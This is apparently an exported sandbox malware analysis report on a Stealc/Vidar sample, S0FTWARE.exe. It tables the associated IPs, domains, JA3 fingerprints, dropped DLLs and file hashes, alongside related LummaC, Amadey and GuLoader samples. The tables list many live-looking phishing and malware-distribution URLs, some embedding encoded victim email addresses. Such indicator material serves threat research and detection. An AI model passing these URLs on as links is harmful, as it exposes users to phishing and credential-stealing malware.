                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, prod-agic-we-2.westeurope.cloudapp.azure.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, wildcardtlu-ssl.azureedge.net, a1834.dscg2.akamai.net, edgedl.me.gvt1.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager
                                                                                                                                                                                                                                  • Execution Graph export aborted for target S0FTWARE.exe, PID 8056 because there are no executed function
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • VT rate limit hit for: S0FTWARE.exe

                                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                  09:48:04API Interceptor1x Sleep call for process: BitLockerToGo.exe modified

                                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  13.107.246.63https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04Stdj4cHPTtKuY-2FmURzzu8QTldxw-2FzpyQYTJMxn3CPFnnsIuOY-2F5ruiOS6FLjm58JljkOmonXKnT8iwwYmA30I9bsERP5vx05gL85c3Lc-2F9WrpUfyNz12kcqjd3wt6WtaxLWxoHc5J3Zua9xQUurCc2AIjJtnP8Xu6Otzn8DBWsS0QPl2WC-2FCyrpDHulFvP0eEWn9IDo-2BqFc1GmD1SsVw5lRKY6yWeuyFQhUWIqZ4VCAeEroA6Ndqh9iaNvFz0XzERrEFYNTxkPirSQWkw6YqX5uo-3DaVWv_h5yw3DykLZfOpXzx776oAcLdVv6tuK-2FE7nfoR01CbnMOUH4fGhxn3KVtBew-2BRfJoKGgpvyhjBTXBTw1J6hN0wi-2FkZpowy1W9-2BTe-2Bf57Ts50FCXINRnefXkQ-2FFO3hKPeSa4hJKnd-2Bpj-2F7GS6r3Uq0ucRRb6izhExkinWfndIosIP-2Ff06hq3eO6ged-2F-2FYA1ldX-2BK4wuZipA-2BXRgTIkXvTbKj74iEMllOxCNkgoQZE3mKkIMM6o0L-2FNgq5TR8KcWZzS-2BEoZ1Oyop5AmC8zRE1SSKfnZ-2F0g1qg2dir-2F788Fq8CtpqmRpkFaF34nQcSYSfbixDSj0B5gj0fuY43UiPKR2D9s0w8lZaDR5dDYOswzPttauCIiIjiyfK20I-2BA4JjKFgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      20.25.227.174file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • www.aib.gov.uk/
                                                                                                                                                                                                                                                                          NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 2s.gg/3zs
                                                                                                                                                                                                                                                                          PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 2s.gg/42Q
                                                                                                                                                                                                                                                                          06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 2s.gg/3zk
                                                                                                                                                                                                                                                                          Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 2s.gg/3zM

                                                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                          t.meqaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          https://account.metasystemchat.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                                                                          eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          https://usapress.info/inside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 46.105.201.240
                                                                                                                                                                                                                                                                          https://l.facebook.com/l.php?u=https%3A%2F%2Fusapress.info%2Finside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0r3IVxCUPtQPPqP5Ce0_adoAsiHgG3Oy1cYDq3k1JXBIrTGLtjToxlazM_aem_q02YsKkKY0QB_fm5suzUDw&h=AT1Xo_CkNlagO29_sds-m5zdTBZ6-H70m0J__7wjjmSNinwNGqBfRUFK3cH2zXJWNO7msrJPRkNulrkTmUCLkRNMcfCJTNK-cs4SfUQyRy7nw3vP1DNmFisBvlttaen8fHfi-N3lXN_BGQgdBw&__tn__=R%5D-R&c%5B0%5D=AT3euz91upHKeMVK8p24ktUFKClJ0GKt_3lJnV9tGakx0Tro3u7Ymk1z4tOG4eBZxcuD-Ny10eAla4iUyfdG04Fh4GryHwAMuELGG4dQctfWKiu4mfB-eLJ8Qktnq0ptzD_TaZEPEMHQnvP4W65jDpc-XBmWlMSmaRM-2soPhaPGYAODWegqP8h47S90Q2hmwQvQgUDdb35OgV1duzzqudMAyOk7e8E7mfpnrlwhIvWwUkK53AUNuPTqYkQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 46.105.201.240
                                                                                                                                                                                                                                                                          Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          SOfQumBuFd.exeGet hashmaliciousBinder HackTool, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          https://page-speed-2950.my.salesforce-sites.com/supportGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 104.26.6.129
                                                                                                                                                                                                                                                                          chrome.cloudflare-dns.comwE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                          test2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                          test2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          ssl.bingadsedgeextension-prod-europe.azurewebsites.netfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56

                                                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUShttps://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 52.108.8.12
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.44
                                                                                                                                                                                                                                                                          Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 20.190.159.68
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.44
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.44
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                          Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 40.126.32.138
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                          96c27caf-3816-d26f-4af5-19e1d76e6c15.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 52.109.89.19
                                                                                                                                                                                                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUShttps://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 52.108.8.12
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.44
                                                                                                                                                                                                                                                                          Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 20.190.159.68
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.44
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.44
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                          Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 40.126.32.138
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                          96c27caf-3816-d26f-4af5-19e1d76e6c15.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 52.109.89.19
                                                                                                                                                                                                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUShttps://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 52.108.8.12
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.44
                                                                                                                                                                                                                                                                          Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 20.190.159.68
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.44
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.44
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                          Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 40.126.32.138
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                          96c27caf-3816-d26f-4af5-19e1d76e6c15.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 52.109.89.19

                                                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                          1138de370e523e824bbca92d049a3777file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          https://www.google.ca/url?q=30NUMBER&rct=44304277659948745221&sa=t&url=amp/s/estudioit.cl/starl/%23YmhpbmVzQGlubm92aWEuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          https://etiv-tcaer.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 23.206.229.226
                                                                                                                                                                                                                                                                          28a2c9bd18a11de089ef85a160da29e4http://modelingcontest.000.pe/en?fbclid=PAZXh0bgNhZW0CMTEAAaa6oIoeflm16eQmOq1EZIkCPi7LQwqIUcx7ZtlQ7FlCxpWEYZM0cKUWzVI_aem_dLuQfyf714XDRjlRdJDY2QGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          Rte_PRPay.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          http://nemoinsure.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          https://vintagefarmandbarn.com/%25$$%25$%25/%25$$%25/dBsG4Ne3GFI7tW1iwp6n.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          http://www.tqltrax.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          z1Tender_procurement_product_order__21_11_2024_.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95

                                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                          C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                              C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                    E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse

                                                                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\AECAKJ

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
